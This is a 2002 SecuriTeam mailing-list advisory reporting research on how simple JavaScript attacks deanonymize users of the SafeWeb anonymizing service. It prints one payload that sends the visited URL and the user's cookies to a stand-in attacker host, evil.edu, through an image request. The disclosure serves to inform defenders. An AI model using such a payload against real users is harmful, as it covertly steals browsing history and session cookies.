[NEWS] Deanonymizing SafeWeb Users

From: support@securiteam.com
Date: 02/14/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Thu, 14 Feb 2002 18:37:11 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Deanonymizing SafeWeb Users
------------------------------------------------------------------------

SUMMARY

Although SafeWeb's Web anonymizing service has been shut down since
December, they claimed it was the "most widely used online privacy service
in the world". SafeWeb licensed their technology to PrivaSec, who is
currently running the technology in a preview program for a planned
subscription service. They also licensed it to the CIA.

A technical report detailing SafeWeb's catastrophic failures under the
simplest of JavaScript attacks by Web sites or firewalls (e.g., by
redirecting to a page containing the exploit) has been published, a link
is provided below.

DETAILS

An example (really one long line):
self['window']['top'].frames[0]['cookie_munch'] = Function('i=new
Image(1,1);i.s'+'rc="https://evil.edu/"+top.frames[0].document.forms["fugulo cation"].URL_text.value+(new Date()).getTime()+document.cookie;');

This is spyware. Any Web page containing this JavaScript makes the SafeWeb
browser silently report every URL visited to the attacker at evil.edu,
along with a copy of all of the persistent cookies previously established
through SafeWeb. It works regardless of the user's security settings
(recommended vs. paranoid mode, etc.) This attack is the only one the
authors describe that depends on the browser: it works in Netscape 6.x and
probably previous versions, but not IE. There are other attacks that do
the same thing and work in IE too, but they are a bit longer. Since the
attacks are just JavaScript, they probably do not depend on the OS of the
victim.

Using the SafeWeb privacy service helps keep user identities out of
routinely gathered log files, but it creates serious new risks for anyone
an adversary might bother to actually target. You have to wonder whether
this is a good tradeoff. After all, in the absence of serious bugs, Web
browsers generally prevent Web sites from silently depositing spyware or
collecting all of the user's cookies. One thing is clear: most users in
the intended market for this system had no idea that this system brought
any risks with it.

Vendor status:
The authors have been in touch with SafeWeb since October and with
PrivaSec for about a month now. Some related problems in SafeWeb involving
JavaScript spilling IP addresses have been noted here (by Alexander
Yezhov) and in alt.privacy.anon-server (by Paul Rubin). This paper adds
spyware, cookie snarfing, and the essential equivalence between SafeWeb's
"paranoid" and "recommended" modes of operation to the list of problems
with SafeWeb's technology.

ADDITIONAL INFORMATION

For the full report (23 pages, PDF):
 <http://www.cs.bu.edu/techreports/pdf/2002-003-deanonymizing-safeweb.pdf>
http://www.cs.bu.edu/techreports/pdf/2002-003-deanonymizing-safeweb.pdf

The information has been provided by <mailto:dm@cs.bu.edu> David Martin
and Andrew Schulman.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages